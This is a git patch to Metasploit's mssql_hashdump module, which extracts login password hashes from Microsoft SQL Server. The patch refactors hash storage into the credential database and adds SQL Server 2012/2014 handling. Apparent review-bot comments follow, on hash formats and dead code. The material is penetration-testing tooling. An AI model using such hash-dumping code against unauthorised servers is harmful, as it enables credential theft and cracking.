From d3949b3d6c0fd762fccdda0e012291bc6ba9c9be Mon Sep 17 00:00:00 2001
From: David Maloney
Date: Tue, 3 Jun 2014 15:02:59 -0500
Subject: [PATCH] refactor mssql_hashdump

refactor mssql_hashdump to use Metasploit:Credential
---
 Gemfile | 2 +-
 Gemfile.lock | 6 +--
 .../auxiliary/scanner/mssql/mssql_hashdump.rb | 41 +++++++++++++++----
 3 files changed, 38 insertions(+), 11 deletions(-)
diff --git a/Gemfile b/Gemfile
index 353a73cc3e..df1610bca5 100755
--- a/Gemfile
+++ b/Gemfile
@@ -27,7 +27,7 @@ group :db do
 # Needed for Msf::DbManager
 gem 'activerecord', '>= 3.0.0', '< 4.0.0'
 # Metasploit::Creential database models
- gem 'metasploit-credential', git: 'github-metasploit-credential:rapid7/metasploit-credential.git', tag: 'v0.1.8-metasploit-credential'
+ gem 'metasploit-credential', git: 'github-metasploit-credential:rapid7/metasploit-credential.git', tag: 'v0.1.10-metasploit-credential'
 # Database models shared between framework and Pro.
 gem 'metasploit_data_models', '~> 0.17.1'
 # Needed for module caching in Mdm::ModuleDetails
diff --git a/Gemfile.lock b/Gemfile.lock
index c70fc9b031..ddd48121ea 100644
--- a/Gemfile.lock
+++ b/Gemfile.lock
@@ -1,9 +1,9 @@
 GIT
 remote: github-metasploit-credential:rapid7/metasploit-credential.git
- revision: 2be17e6327b4a5caa9a22ffc0b064923a25a222c
- tag: v0.1.8-metasploit-credential
+ revision: 728ab82ab069edb21815fa944c1b8224b0511376
+ tag: v0.1.10-metasploit-credential
 specs:
- metasploit-credential (0.1.8.pre.electro.pre.release)
+ metasploit-credential (0.1.10.pre.electro.pre.release)
 metasploit-concern (~> 0.0.4)
 metasploit_data_models (~> 0.17.0)
 rubyntlm
diff --git a/modules/auxiliary/scanner/mssql/mssql_hashdump.rb b/modules/auxiliary/scanner/mssql/mssql_hashdump.rb
index a31c2637c6..91a5ecf793 100644
--- a/modules/auxiliary/scanner/mssql/mssql_hashdump.rb
+++ b/modules/auxiliary/scanner/mssql/mssql_hashdump.rb
@@ -55,10 +55,10 @@ class Metasploit3 < Msf::Auxiliary
 case version_year
 when "2000"
- hashtype = "mssql.hashes"
+ hashtype = "mssql"
- when "2005", "2008"
- hashtype = "mssql05.hashes"
+ when "2005", "2008", "2012", "2014"
+ hashtype = "mssql05"
 end
 this_service = report_service(
@@ -74,15 +74,42 @@ class Metasploit3 < Msf::Auxiliary
 'Columns' => ['Username', 'Hash']
 )
- hash_loot=""
+ service_data = {
+ address: ::Rex::Socket.getaddress(rhost,true),
+ port: rport,
+ service_name: 'mssql',
+ protocol: 'tcp',
+ workspace_id: myworkspace_id
+ }
+
 mssql_hashes.each do |row|
 next if row[0].nil? or row[1].nil?
 next if row[0].empty? or row[1].empty?
+
+ credential_data = {
+ module_fullname: self.fullname,
+ origin_type: :service,
+ private_type: :nonreplayable_hash,
+ private_data: row[1],
+ username: row[0],
+ jtr_format: hashtype
+ }
+
+ credential_data.merge!(service_data)
+
+ credential_core = create_credential(credential_data)
+
+ login_data = {
+ core: credential_core,
+ status: Metasploit::Credential::Login::Status::UNTRIED
+ }
+
+ login_data.merge!(service_data)
+ login = create_credential_login(login_data)
+
 tbl << [row[0], row[1]]
 print_good("#{rhost}:#{rport} - Saving #{hashtype} = #{row[0]}:#{row[1]}")
 end
- filename= "#{datastore['RHOST']}-#{datastore['RPORT']}_sqlhashes.txt"
- store_loot(hashtype, "text/plain", datastore['RHOST'], tbl.to_csv, filename, "MS SQL Hashes", this_service)
 end
 #Grabs the user tables depending on what Version of MSSQL
@@ -99,7 +126,7 @@ class Metasploit3 < Msf::Auxiliary
 when "2000"
 results = mssql_query(mssql_2k_password_hashes())[:rows]
- when "2005", "2008"
+ when "2005", "2008", "2012", "2014"
 results = mssql_query(mssql_2k5_password_hashes())[:rows]
 end
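Review bot: Folding 2012 and 2014 into `when "2005", "2008", "2012", "2014"` with `hashtype = "mssql05"` mislabels those hashes: SQL Server 2012 and later store SHA-512 password hashes (0x0200 prefix), which John the Ripper cracks under the `mssql12` format, whereas `mssql05` is the SHA-1 (0x0100) format used by 2005/2008. Because `hashtype` now becomes each credential's `jtr_format`, anything cracking straight from the database will run the wrong algorithm against every 2012/2014 row and silently find nothing. I would keep `when "2005", "2008"` with `hashtype = "mssql05"` and add a separate `when "2012", "2014"` branch setting `hashtype = "mssql12"`; the shared query selection in the last hunk can stay as it is. Sniffing the 0x0100/0x0200 prefix of the returned hash would be more robust than trusting the reported version, but that is a larger change than this refactor. The enclosing method starts before and ends after this hunk.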
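Review bot: `login` on the new `login = create_credential_login(login_data)` line is assigned and never read; a bare `create_credential_login(login_data)` says the same thing without the dead local. Separately, dropping `store_loot` removes the only consumer of `tbl` visible here, yet `tbl << [row[0], row[1]]` still runs for every row under the `'Columns' => ['Username', 'Hash']` table set up just above; if nothing after this hunk prints or stores the table, `tbl` should go too, and if the loot file was deliberately dropped, note that the credential path presumably persists nothing when no database is connected, so users without one lose the dump entirely. Minor style: `getaddress(rhost,true)` wants a space after the comma, `::Rex::Socket.getaddress(rhost, true)`. The enclosing method starts before and ends after this hunk.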